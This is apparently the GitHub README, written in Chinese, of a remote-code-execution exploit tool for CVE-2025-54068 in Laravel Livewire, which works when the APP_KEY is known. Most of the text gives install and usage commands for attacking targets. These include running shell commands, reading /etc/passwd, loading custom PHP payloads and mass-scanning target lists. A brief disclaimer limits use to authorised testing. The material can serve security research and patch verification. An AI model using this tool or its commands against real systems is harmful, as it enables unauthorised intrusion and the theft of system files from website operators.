haxorstars/CVE-2025-54068
GitHub: haxorstars/CVE-2025-54068
针对 Livewire 框架 CVE-2025-54068 漏洞的远程命令执行利用工具,支持批量检测与自定义 payload。
Stars: 3 | Forks: 2
# CVE-2025-54068
这是一个旨在利用 CVE-2025-54068 的工具,如果在已知 Livewire 项目 APP_KEY 的情况下,可实现远程命令执行。
该工具是基于 **Synacktiv** 的原始项目重新编写的版本:
* **Livepyre** — [https://github.com/synacktiv/Livepyre](https://github.com/synacktiv/Livepyre)
核心概念和方法论基于原始实现。
此版本包含了一些细微的增强和额外功能,以提升可用性和灵活性。
## 安装
使用 pipx 安装该工具:
```
pipx install git+https://github.com/haxorstars/CVE-2025-54068
```
或使用 uv:
```
uv tool install git+https://github.com/haxorstars/CVE-2025-54068
```
## 🚀 基本用法
针对单个目标运行该工具:
```
livewire-rce-2025 -u target.com
```
使用自定义参数:
```
livewire-rce-2025 -u https://target.com -p "id;uname -a;pwd;ls -la"
```
## 🛠️ 自定义功能
执行预定义的自定义功能:
```
livewire-rce-2025 -u target.com --custom-function "shell:ls -la"
livewire-rce-2025 -u target.com --custom-function "read:/etc/passwd"
livewire-rce-2025 -u target.com --custom-function "phpinfo"
livewire-rce-2025 -u target.com --custom-function "config"
```
在一条命令中组合多个功能:
```
livewire-rce-2025 -u target.com --custom-function "shell:whoami && shell:id && read:/etc/passwd"
```
## 🧩 自定义 PHP 文件
使用您自己的 PHP payload 文件:
```
livewire-rce-2025 -u target.com --custom-file custom.php --param "shell:id"
```
## 🧪 仅生成 Payload
生成 payload 但不将其发送到目标:
```
livewire-rce-2025 -generate-payload --custom-function "shell:ls -la"
```
或使用自定义 PHP 文件:
```
livewire-rce-2025 -generate-payload --custom-file custom.php
```
## 📦 批量检查
从文件中扫描多个目标:
```
livewire-rce-2025 -mass-check targets.txt -o results.json
```
使用自定义线程数:
```
livewire-rce-2025 -mass-check targets.txt -t 20 -o results.json
```
## ⚠️ 免责声明
本工具仅供**教育和授权安全测试目的**使用。请勿针对您不拥有或未获得明确测试许可的系统使用本工具。
祝您 Hacking 愉快😄
标签:APP_KEY泄露, CISA项目, CVE-2025-54068, EXP, Laravel, Livewire, OpenVAS, Payload生成, PHP, POC, Python, RCE, 反序列化, 命令注入, 密钥利用, 批量检测, 无后门, 白盒审计, 编程工具, 网络安全, 远程代码执行, 逆向工具, 隐私保护